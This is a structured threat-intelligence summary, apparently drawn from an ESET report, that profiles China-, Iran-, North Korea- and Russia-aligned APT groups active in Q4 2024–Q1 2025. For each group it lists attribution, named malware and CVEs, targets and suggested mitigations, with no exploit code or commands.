Full Report
An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025
Analysis Summary
# Threat Actor: Mustang Panda
## Attribution & Identity
China-aligned threat actor.
## Activity Summary
Continued persistent espionage campaigns during the monitored period (Q4 2024 – Q1 2025), focusing on European organizations, governmental institutions, and maritime transportation companies.
## Tactics, Techniques & Procedures
- Use of **Korplug** loaders.
- Deployment via **malicious USB drives**.
## Targeting
- Sectors: Governmental institutions, maritime transportation companies.
- Geography: European organizations (implied focus).
- Victims: Not specifically named, but targeting governmental institutions.
## Tools & Infrastructure
- Malware families used: **Korplug** loaders.
- Infrastructure: Not explicitly detailed.
## Implications
Represents the most active China-aligned threat actor monitored during the period, illustrating persistent espionage targeting critical sectors in Europe.
## Mitigations
Defend against spearphishing/watering hole attacks leading to USB execution; monitor for Korplug activity.
***
# Threat Actor: DigitalRecyclers
## Attribution & Identity
China-aligned threat actor.
## Activity Summary
Targeting EU governmental entities.
## Tactics, Techniques & Procedures
- Usage of the **KMA VPN anonymization network**.
- Deployment of backdoors: **RClient**, **HydroRShell**, and **GiftBox**.
## Targeting
- Sectors: EU governmental entities.
- Geography: EU countries (implied).
- Victims: Governmental entities.
## Tools & Infrastructure
- Malware families used: **RClient**, **HydroRShell**, **GiftBox**.
- Infrastructure: **KMA VPN anonymization network**.
## Implications
Continues to target European government infrastructure using established, multi-stage access tools.
## Mitigations
Monitor network traffic associated with KMA VPN; ensure rapid detection and containment of deployed backdoors.
***
# Threat Actor: PerplexedGoblin
## Attribution & Identity
China-aligned threat actor.
## Activity Summary
Employed a new espionage backdoor against a Central European government entity.
## Tactics, Techniques & Procedures
- Used a new espionage backdoor named **NanoSlate**.
## Targeting
- Sectors: Government entities.
- Geography: Central European country.
- Victims: One Central European government entity mentioned.
## Tools & Infrastructure
- Malware families used: **NanoSlate** (new espionage backdoor).
- Infrastructure: Not explicitly detailed.
## Implications
Demonstrates ongoing development of bespoke espionage toolsets by China-aligned actors.
## Mitigations
Focus detection efforts on identifying the NanoSlate backdoor behavior.
***
# Threat Actor: Webworm
## Attribution & Identity
China-aligned threat actor.
## Activity Summary
Targeted a Serbian government organization.
## Tactics, Techniques & Procedures
- Emphasized the continued popularity of using **SoftEther VPN** tools.
## Targeting
- Sectors: Government organizations.
- Geography: Serbia.
- Victims: A Serbian government organization.
## Tools & Infrastructure
- Tools used: **SoftEther VPN**.
- Infrastructure: Not explicitly detailed.
## Implications
Highlights the exploitation of common VPN software, likely for initial access or C2 communication, among China-aligned groups.
## Mitigations
Audit and strictly control configurations of SoftEther VPN installations.
***
# Threat Actor: ShadowPad Cluster (Attribution unclear beyond toolset)
## Attribution & Identity
Attribution uncertain, noted as a **ShadowPad cluster**.
## Activity Summary
Primarily engaged in espionage, but sporadically deploys ransomware for financial gain.
## Tactics, Techniques & Procedures
- Utilizes **ShadowPad** implant.
## Targeting
- Sectors: Not explicitly detailed, but implied espionage targets.
- Geography: Not explicitly detailed.
- Victims: Not specifically named.
## Tools & Infrastructure
- Malware families used: **ShadowPad**.
- Infrastructure: Not explicitly detailed.
## Implications
Represents a dual-purpose threat actor where espionage activities can suddenly shift to destructive/financial extortion operations.
## Mitigations
Implement layered defenses capable of detecting both espionage implants and ransomware execution.
***
# Threat Actor: Worok
## Attribution & Identity
Threat actor whose confirmed usage of toolsets necessitated correcting past third-party attributions to other groups.
## Activity Summary
Frequent use of shared espionage toolsets across operations.
## Tactics, Techniques & Procedures
- Frequent use of shared espionage toolsets, including: **HDMan**, **PhantomNet**, and **Sonifake**.
## Targeting
- Sectors: Not explicitly detailed.
- Geography: Not explicitly detailed.
- Victims: Not specifically named.
## Tools & Infrastructure
- Malware families used: **HDMan**, **PhantomNet**, **Sonifake**.
- Infrastructure: Not explicitly detailed.
## Implications
Clarifies attribution issues surrounding commonly used espionage toolsets, confirming Worok as a primary user.
## Mitigations
Maintain accurate threat intelligence regarding toolset lineage to avoid misattributing activity.
***
# Threat Actor: MuddyWater
## Attribution & Identity
Iran-aligned threat actor.
## Activity Summary
Frequently leveraged RMM software in spearphishing attacks. Collaborated closely with **Lyceum** (an OilRig subgroup) during targeting activities.
## Tactics, Techniques & Procedures
- Frequently leveraged **Remote Monitoring and Management (RMM) software** in initial compromise stages.
## Targeting
- Sectors: Manufacturing.
- Geography: Israel (implied cooperation region).
- Victims: An Israeli manufacturing company.
## Tools & Infrastructure
- Tools used: Various **RMM software**.
- Infrastructure: Not explicitly detailed.
## Implications
Demonstrates collaborative efforts between Iran-aligned groups (MuddyWater and Lyceum) focusing on specific economic sectors.
## Mitigations
Restrict RMM tool usage and audit all external connections to authorized RMM hosts.
***
# Threat Actor: Lyceum (OilRig Subgroup)
## Attribution & Identity
Subgroup of **OilRig**, Iran-aligned.
## Activity Summary
Collaborated closely with MuddyWater to target an Israeli manufacturing company.
## Tactics, Techniques & Procedures
- Not specified beyond collaboration details.
## Targeting
- Sectors: Manufacturing.
- Geography: Israel (implied cooperation region).
- Victims: An Israeli manufacturing company.
## Tools & Infrastructure
- Infrastructure used relies on **MuddyWater's RMM usage**.
## Implications
Indicates organized, goal-oriented collaboration between distinct Iran-aligned units for targeted impact.
## Mitigations
Monitor for activity indicative of multiple threat actor operations converging on a single target.
***
# Threat Actor: BladedFeline
## Attribution & Identity
Iran-aligned threat actor (implied by context following MuddyWater/Lyceum).
## Activity Summary
Revisited an earlier victim, a telecommunications company in Uzbekistan, coinciding with diplomatic outreach by Iran.
## Tactics, Techniques & Procedures
- Not specified.
## Targeting
- Sectors: Telecommunications.
- Geography: Uzbekistan.
- Victims: A telecommunications company (previous victim revisited).
## Tools & Infrastructure
- Not specified.
## Implications
Suggests potential correlation between state diplomatic activities and targeted espionage operations in the region.
## Mitigations
Maintain heightened scrutiny on critical infrastructure, such as telecom providers, during periods of geopolitical shifts.
***
# Threat Actor: CyberToufan
## Attribution & Identity
Iran-aligned threat actor.
## Activity Summary
Conducted **destructive operations**, deploying a wiper attack against multiple organizations.
## Tactics, Techniques & Procedures
- Deployed a **wiper attack**.
## Targeting
- Sectors: Unspecified organizations.
- Geography: Israel.
- Victims: Multiple organizations in Israel.
## Tools & Infrastructure
- Malware families used: **Wiper** (specific name not provided).
- Infrastructure: Not explicitly detailed.
## Implications
Represents a shift towards destructive capabilities among Iran-aligned actors targeting Israel.
## Mitigations
Implement robust offline/immutable backups and advanced endpoint detection to counter destructive malware.
***
# Threat Actor: DeceptiveDevelopment
## Attribution & Identity
North Korea-aligned threat actor, particularly active in financially motivated campaigns.
## Activity Summary
Significantly broadened targeting by using fake job listings primarily within the cryptocurrency, blockchain, and finance sectors. Employed innovative social engineering (ClickFix attacks, bogus GitHub issue posts) to distribute malware. The Bybit cryptocurrency theft was also attributed to this actor by the FBI.
## Tactics, Techniques & Procedures
- Social Engineering: **Fake job listings**, **ClickFix attacks**, **bogus GitHub issue posts**.
- Deployed **multiplatform WeaselStore malware**.
## Targeting
- Sectors: Cryptocurrency, blockchain, finance.
- Geography: Global (implied by targeting specific industries).
- Victims: Individuals seeking employment in finance/crypto; the **Bybit cryptocurrency theft** (causing ~$1.5B loss) linked to compromise of **Safe{Wallet}** via supply chain.
## Tools & Infrastructure
- Malware families used: **WeaselStore** (multiplatform).
- Infrastructure: Supply chain compromise targeting **Safe{Wallet}**.
## Implications
Highly sophisticated financial motivation using modern social engineering vectors targeting emerging financial technologies. Led to massive financial loss ($1.5B).
## Mitigations
Implement strict validation processes for job applications originating from external sources; enhance security around supply chain elements like software wallets.
***
# Threat Actor: TraderTraitor
## Attribution & Identity
North Korea-aligned threat actor, linked by the FBI to the Bybit theft.
## Activity Summary
Involved in the **Bybit cryptocurrency theft**, executing a supply-chain compromise of **Safe{Wallet}**.
## Tactics, Techniques & Procedures
- **Supply-chain compromise**.
## Targeting
- Sectors: Cryptocurrency/Finance.
- Geography: Not specified.
- Victims: Bybit via Safe{Wallet} ($1.5 billion in losses).
## Tools & Infrastructure
- Infrastructure targeted: **Safe{Wallet}**.
## Implications
Represents one of the most significant financial losses attributed to a North Korea-aligned group during the monitoring period.
## Mitigations
Intense scrutiny on software updates and third-party dependencies within critical financial applications.
***
# Threat Actor: Kimsuky and Konni
## Attribution & Identity
North Korea-aligned threat actors.
## Activity Summary
Returned to normal activity levels in early 2025 after a decline, shifting primary targeting away from English-speaking think tanks, NGOs, and North Korea experts.
## Tactics, Techniques & Procedures
- Targeting shift noted.
## Targeting
- Sectors: Shifted away from think tanks/NGOs. Primary pivot to **South Korean entities** and **diplomatic personnel**.
- Geography: South Korea (primary focus).
- Victims: South Korean entities and diplomatic personnel.
## Tools & Infrastructure
- Not specified.
## Implications
Indicates operational tempo shifts likely aligned with evolving geopolitical priorities concerning the Korean peninsula.
## Mitigations
Increased monitoring of communications directed at South Korean diplomatic and academic targets.
***
# Threat Actor: Andariel
## Attribution & Identity
North Korea-aligned threat actor.
## Activity Summary
Resurfaced after a year of inactivity with a sophisticated attack against a South Korean industrial software company.
## Tactics, Techniques & Procedures
- Executed a **sophisticated attack**.
## Targeting
- Sectors: Industrial software.
- Geography: South Korea.
- Victims: A South Korean industrial software company.
## Tools & Infrastructure
- Not specified.
## Implications
Resurrection of a significant, previously dormant threat actor with targeted, high-value operational focus.
## Mitigations
Companies dealing with industrial control systems or related software development should reassess threat exposure to previously dormant actors.
***
# Threat Actor: Sednit
## Attribution & Identity
Russia-aligned threat actor.
## Activity Summary
Maintained aggressive campaigns, refining exploitation of XSS vulnerabilities in webmail services. Successfully leveraged a zero-day against MDaemon against Ukrainian companies. Expanded Operation RoundPress to include Horde, MDaemon, and Zimbra (previously Roundcube).
## Tactics, Techniques & Procedures
- Exploited **Cross-Site Scripting (XSS)** vulnerabilities in webmail services.
- Leveraged **CVE‑2024‑11182** (Zero-day in **MDaemon Email Server**) against Ukrainian companies.
- Affected platforms: **Roundcube**, **Horde**, **MDaemon**, and **Zimbra**.
## Targeting
- Sectors: Unspecified, but focused on organizations utilizing vulnerable webmail infrastructure.
- Geography: Ukraine and EU countries.
- Victims: Ukrainian companies (specifically targeted with the MDaemon zero-day).
## Tools & Infrastructure
- Campaigns: **Operation RoundPress**.
- Infrastructure targeted: Webmail servers.
## Implications
Demonstrates persistent focus on penetrating EU/Ukrainian infrastructure using high-impact vulnerability exploitation, including novel zero-days.
## Mitigations
Immediate patching/mitigation for CVE‑2024‑11182 and ensuring robust XSS protection across all webmail platforms.
***
# Threat Actor: RomCom
## Attribution & Identity
Russia-aligned threat actor.
## Activity Summary
Demonstrated advanced capabilities by deploying zero-day exploits against widely used software.
## Tactics, Techniques & Procedures
- Deployed **zero-day exploits** against:
- **Mozilla Firefox (CVE‑2024‑9680)**.
- **Microsoft Windows (CVE‑2024‑49039)**.
## Targeting
- Sectors: Unspecified.
- Geography: Implied Ukraine/EU given context.
- Victims: Users/systems running vulnerable Firefox and Windows installations.
## Tools & Infrastructure
- Vulnerabilities exploited: CVE‑2024‑9680, CVE‑2024‑49039.
## Implications
Indicates access to and willingness to deploy sophisticated, high-value zero-day tools against common desktop and enterprise software.
## Mitigations
Prioritize patching for known vulnerabilities, especially those disclosed publicly, and ensure zero-day detection capabilities.
***
# Threat Actor: Gamaredon
## Attribution & Identity
Russia-aligned threat actor.
## Activity Summary
Remained the most prolific actor targeting Ukraine. Enhanced malware obfuscation techniques and introduced a new file stealer leveraging Dropbox for C2/exfiltration.
## Tactics, Techniques & Procedures
- Enhanced **malware obfuscation**.
- Introduced **PteroBox** (a file stealer).
- Utilizes **Dropbox** for C2/exfiltration.
## Targeting
- Sectors: Unspecified.
- Geography: Ukraine (primary focus).
- Victims: Not specifically named.
## Tools & Infrastructure
- Malware families used: **PteroBox**.
- Infrastructure leveraged: **Dropbox** (for C2/exfiltration).
## Implications
Continues high operational tempo against Ukraine, utilizing common cloud services for stealthy infrastructure operations.
## Mitigations
Monitor internal network traffic for unusual outbound connections to Dropbox API endpoints indicative of PteroBox operation.
***
# Threat Actor: Sandworm
## Attribution & Identity
Russia-aligned threat actor (infamous group).
## Activity Summary
Intensified **destructive operations** against Ukrainian energy companies. Utilized RMM tools in early compromise phases and deployed a new wiper.
## Tactics, Techniques & Procedures
- Deployed a new wiper named **ZEROLOT**.
- Utilized **RMM tools** in early compromise stages.
- Deployed ZEROLOT via **Active Directory Group Policy**.
## Targeting
- Sectors: Energy companies.
- Geography: Ukraine.
- Victims: Ukrainian energy companies.
## Tools & Infrastructure
- Malware families used: **ZEROLOT** (wiper).
- Infrastructure used: **Active Directory Group Policy** for deployment.
## Implications
Represents a severe threat to operational continuity, focusing destructive actions on critical national infrastructure (energy sector).
## Mitigations
Strengthen Active Directory security policies, restrict RMM tool use, and ensure the ZEROLOT wiper signature is detectable.
***
# Threat Actor: APT-C-60
## Attribution & Identity
Lesser-known group (China-aligned implied by naming convention, though not explicitly stated in this context).
## Activity Summary
Focusing operations specifically on individuals based in Japan who are possibly linked to North Korea.
## Tactics, Techniques & Procedures
- Not specified.
## Targeting
- Sectors: Individuals with potential North Korean links.
- Geography: Japan.
- Victims: Individuals in Japan.
## Tools & Infrastructure
- Not specified.
## Implications
Indicates nuanced, likely counter-intelligence focused espionage targeting specific individuals based on tangential international relationships.
## Mitigations
Heightened scrutiny on external communications for individuals identified as potential intelligence targets.
***
# Threat Actor: Unidentified Threat Actor (WEF/Election Impersonation)
## Attribution & Identity
As yet **unidentified threat actor**.
## Activity Summary
Conducted a highly **targeted phishing campaign** impersonating the World Economic Forum (WEF) and election websites to obtain sensitive information.
## Tactics, Techniques & Procedures
- **Highly targeted phishing**.
- Impersonation of **World Economic Forum (WEF)** and **election websites**.
## Targeting
- Sectors: Government/Diplomatic personnel.
- Geography: Ukraine (targets).
- Victims: Ukrainian officials and diplomats.
## Tools & Infrastructure
- Not specified.
## Implications
A high-confidence, highly targeted effort aimed at compromising Ukrainian leadership during sensitive political periods.
## Mitigations
Conduct rigorous security awareness training focusing on spearphishing, especially during election cycles or major international events like WEF meetings.
***
# Threat Actor: StealthFalcon
## Attribution & Identity
Threat actor (alignment not specified in excerpt).
## Activity Summary
Conducted **espionage focused operations**.
## Tactics, Techniques & Procedures
- Not specified.
## Targeting
- Geography: Türkiye and Pakistan.
- Victims: Not specifically named.
## Tools & Infrastructure
- Not specified.
## Implications
Indicates active, targeted espionage in the Middle East/South Asia region.
## Mitigations
General espionage defense posture hardening recommended for entities in these regions.